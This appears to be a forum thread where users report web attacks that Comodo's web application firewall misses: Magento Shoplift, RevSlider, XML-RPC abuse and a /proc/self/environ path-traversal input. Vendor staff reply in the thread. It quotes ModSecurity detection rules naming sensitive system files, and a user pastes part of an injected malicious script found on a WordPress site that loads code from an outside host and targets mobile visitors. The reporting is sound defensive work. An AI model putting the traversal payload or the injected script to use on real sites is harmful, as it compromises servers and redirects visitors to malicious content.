Attacks and Exploits which are undetected

We would be grateful for any information about attacks and exploits which are undetected by Comodo WAF.

Thank you for all your feedbacks which help us to improve Comodo protection rules.

here’s one, very serious:

https://www.ostraining.com/blog/general/magento-shoplift/

Should be added immediately!

Magento shoplift hack should be added asap!
Any eta on that?

What’s the point in asking users for input when the rules don’t get added?

For example the revslider rule has never been added to the LiteSpeed ruleset, refer to thread: https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall-b223.0/-t107211.0.html

Now we have the ShopLift hack from Mangento which also hasn’t been patched. Hackers would have already reaped the benefits and dismantled as many sites as possible.

There’s no point running a WAF if the rules are delayed by weeks or months… hackers will infiltrate before that time.

This one is very serious, OLD and no protection, and permits upload of shells-

https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall/another-joomla-big-exploit-not-stoped-t111095.0.html

REVSLIDER continues.
This one is BIG, attacked on thousands of sites, that still don’t update, and it seems that’s very hard to update this plugin.

I thought CWAF blocked this, but it seems that it doesn’t block at all, OWASP do.

Please make a block on this one, just this night 10 wordpress’s where attacked with this. My antivirus rules blocked the shell file, but this is on the wild, free for everyone to attack.

Hello,

there are many XML RPC attacks. Can you make rule for that? if there is a rule can you post a number?

Thanks

any update on any of these?

I reported Malware Cleanup to Arbitrary File Upload in Gravity Forms many months ago (in the report thread) and im still seeing it run wild

Do you know CVE id for this vulnerability?

Sorry for delay reply, we have records set starting from 240330 designed to protect users from XML-RPC attacks.

Does this help https://wpvulndb.com/vulnerabilities/7820

CWAF currently does not protect vulnerable applications which do not sanitize inputs correctly of the form…

index.php?location=…/…/…/…/proc/self/environ

For background information, please see numerous articles such as…

The current rule of…


SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)" \
	"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

…should include protection of /proc/ to become…


SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)" \
	"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

Other rule sets include this protection, and I can not see a downside to its inclusion. We have added a custom rule on our own servers, but it would be nice to have it included as standard in CWAF.

wordpres 4.7.3 , php 5.3.29, apache 2.2x , cp/whm

found in home page article source



s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(„_mauthtoken”)==-1){(function(a,b){if(a.indexOf(„googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-


Hi Catalin S
Thanks for Contacting us. We have blocked this vulnerability. It will be available on coming release.

Hello,

Here is another one undetected.

Maybe you should also block all requests with name hellofromhony(.)com. This domain is used on all vulnerabilities that this hacker is finding.

Hi
Thanks for Contacting us. We are working on this.